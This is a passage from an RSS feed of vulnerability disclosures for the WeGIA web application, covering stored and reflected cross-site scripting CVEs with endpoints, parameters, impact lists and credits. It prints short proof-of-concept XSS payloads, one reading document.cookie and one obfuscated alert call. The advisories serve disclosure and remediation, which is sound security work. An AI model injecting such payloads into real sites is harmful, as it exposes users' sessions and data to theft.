&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-javascript&amp;#34; data-lang=&amp;#34;javascript&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nb&amp;#34;&amp;gt;document&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;.&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;cookie&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;/script&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-22615/402263494-61a235e6-0b07-436e-9f0b-96b50b59b7b5.png&amp;#34;
	width=&amp;#34;936&amp;#34;
	height=&amp;#34;307&amp;#34;
	srcset=&amp;#34;/p/cve-2025-22615/402263494-61a235e6-0b07-436e-9f0b-96b50b59b7b5_hu_7d03079a9d75aabb.png 480w, /p/cve-2025-22615/402263494-61a235e6-0b07-436e-9f0b-96b50b59b7b5_hu_4ea9c358216690.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;304&amp;#34;
		data-flex-basis=&amp;#34;731px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-22615/402263529-aa784a4d-9a41-47b8-ae5e-614fcdff3189.png&amp;#34;
	width=&amp;#34;805&amp;#34;
	height=&amp;#34;239&amp;#34;
	srcset=&amp;#34;/p/cve-2025-22615/402263529-aa784a4d-9a41-47b8-ae5e-614fcdff3189_hu_537486d569a4ba6c.png 480w, /p/cve-2025-22615/402263529-aa784a4d-9a41-47b8-ae5e-614fcdff3189_hu_effe3aded036fc06.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;336&amp;#34;
		data-flex-basis=&amp;#34;808px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt; Reflected cross-site scripting (XSS) attacks can have serious consequences, including:
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;User actions: Attackers can perform any action the user can, such as viewing, modifying, or initiating interactions with other users.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Data theft: Attackers can exfiltrate data or install malware on the user&amp;#39;s machine.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Account compromise: Attackers can manipulate or steal cookies, or compromise confidential information.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Malicious code: Attackers can execute malicious code on the user&amp;#39;s system.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Business reputation damage: Attackers can deface a corporate website or spread misinformation.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Misdirection: Attackers can change the instructions given to users, which can be dangerous if the target is a government website or provides vital resources.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-6q73-74pc-p3c8&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-6q73-74pc-p3c8&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/elisangelasilvademendonca/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/elisangela50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/elisangelasilvademendonca/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Elisangela Mendonça&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;contributors&amp;#34;&amp;gt;Contributors
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/angelo-morette-019/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/angelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/angelo-morette-019/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Angelo Morette&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/diegocbcastro/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/diego50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/diegocbcastro/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Diego Castro&amp;lt;/a&amp;gt;code&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/natan50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Natan Maia Morette&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/rafael-corvino/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/rafael50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/rafael-corvino/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Rafael Corvino&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/Sec-Dojo-Cyber-House/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Mon, 13 Jan 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-22616</title>
        <link>https://www.cvehunters.com/p/cve-2025-22616/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-22616/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-22616-cross-site-scripting-xss-stored-endpoint-dependente_parentesco_adicionarphp-parameter-descricao&amp;#34;&amp;gt;CVE-2025-22616: Cross-Site Scripting (XSS) Stored endpoint &amp;lt;code&amp;gt;dependente_parentesco_adicionar.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;descricao&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-22616&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-22616&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Stored Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;dependente_parentesco_adicionar.php&amp;lt;/code&amp;gt; endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;descricao&amp;lt;/code&amp;gt; and &amp;lt;code&amp;gt;SobrenomeForm&amp;lt;/code&amp;gt; parameters. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-22616-cross-site-scripting-xss-stored-endpoint-dependente_parentesco_adicionarphp-parameter-descricao&amp;#34;&amp;gt;CVE-2025-22616: Cross-Site Scripting (XSS) Stored endpoint &amp;lt;code&amp;gt;dependente_parentesco_adicionar.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;descricao&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-22616&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-22616&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Stored Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;dependente_parentesco_adicionar.php&amp;lt;/code&amp;gt; endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;descricao&amp;lt;/code&amp;gt; and &amp;lt;code&amp;gt;SobrenomeForm&amp;lt;/code&amp;gt; parameters. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;POST /html/funcionario/dependente_parentesco_adicionar.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;descricao&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to properly validate and sanitize user inputs in the &amp;lt;code&amp;gt;dependente_parentesco_adicionar.php&amp;lt;/code&amp;gt; parameter. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim&amp;#39;s browser, potentially compromising the user&amp;#39;s data and system.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;POC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-javascript&amp;#34; data-lang=&amp;#34;javascript&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;top&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;[&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mf&amp;#34;&amp;gt;8680439.&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;.&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;toString&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;30&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)](&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;1337&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;/script&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-22616/402264398-5c931c5a-7a42-4b3e-b826-b68643796162.png&amp;#34;
	width=&amp;#34;957&amp;#34;
	height=&amp;#34;346&amp;#34;
	srcset=&amp;#34;/p/cve-2025-22616/402264398-5c931c5a-7a42-4b3e-b826-b68643796162_hu_29aea712a3d15039.png 480w, /p/cve-2025-22616/402264398-5c931c5a-7a42-4b3e-b826-b68643796162_hu_cadb7982497ab7a7.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;276&amp;#34;
		data-flex-basis=&amp;#34;663px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-22616/402264453-587bf533-3156-4c17-919d-c732200374ae.png&amp;#34;
	width=&amp;#34;807&amp;#34;
	height=&amp;#34;174&amp;#34;
	srcset=&amp;#34;/p/cve-2025-22616/402264453-587bf533-3156-4c17-919d-c732200374ae_hu_7e7d976db95b44f5.png 480w, /p/cve-2025-22616/402264453-587bf533-3156-4c17-919d-c732200374ae_hu_bc681493668c4816.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;463&amp;#34;
		data-flex-basis=&amp;#34;1113px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Stealing session cookies: Attackers can use stolen session cookies to hijack a user&amp;#39;s session and perform actions on their behalf.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Downloading malware: Attackers can trick users into downloading and installing malware on their computers.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Hijacking browsers: Attackers can hijack a user&amp;#39;s browser or deliver browser-based exploits.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Stealing credentials: Attackers can steal a user&amp;#39;s credentials.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Obtaining sensitive information: Attackers can obtain sensitive information stored in a user&amp;#39;s account or in their browser.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Defacing websites: Attackers can deface a website by altering its content.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Damaging a business&amp;#39;s reputation: Attackers can damage a business&amp;#39;s image or spread misinformation by defacing a corporate website.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-xm3h-x3rv-whr5code&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-xm3h-x3rv-whr5code&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/rafael-corvino/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/rafael50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/rafael-corvino/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Rafael Corvino&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;contributors&amp;#34;&amp;gt;Contributors
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/angelo-morette-019/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/angelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/angelo-morette-019/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Angelo Morette&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/diegocbcastro/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/diego50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/diegocbcastro/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Diego Castro&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/elisangelasilvademendonca/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/elisangela50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/elisangelasilvademendonca/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Elisangela Mendonça&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/natan50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Natan Maia Morette&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/Sec-Dojo-Cyber-House/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Mon, 13 Jan 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-22617</title>
        <link>https://www.cvehunters.com/p/cve-2025-22617/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-22617/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-22617-cross-site-scripting-xss-reflected-endpoint-editar_sociophp-parameter-socio&amp;#34;&amp;gt;CVE-2025-22617: Cross-Site Scripting (XSS) Reflected endpoint &amp;lt;code&amp;gt;editar_socio.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;socio&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-22617&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-22617&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Reflected Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;editar_socio.php&amp;lt;/code&amp;gt; endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts in the &amp;lt;code&amp;gt;socio&amp;lt;/code&amp;gt; parameter.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;GET /html/socio/sistema/editar_socio.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;socio&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to validate and sanitize user inputs in the &amp;lt;code&amp;gt;socio&amp;lt;/code&amp;gt; parameter. This lack of validation permits the injection of malicious payloads, which are reflected back to the user&amp;#39;s browser in the server&amp;#39;s response and executed within the context of the victim&amp;#39;s browser.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-22617-cross-site-scripting-xss-reflected-endpoint-editar_sociophp-parameter-socio&amp;#34;&amp;gt;CVE-2025-22617: Cross-Site Scripting (XSS) Reflected endpoint &amp;lt;code&amp;gt;editar_socio.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;socio&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
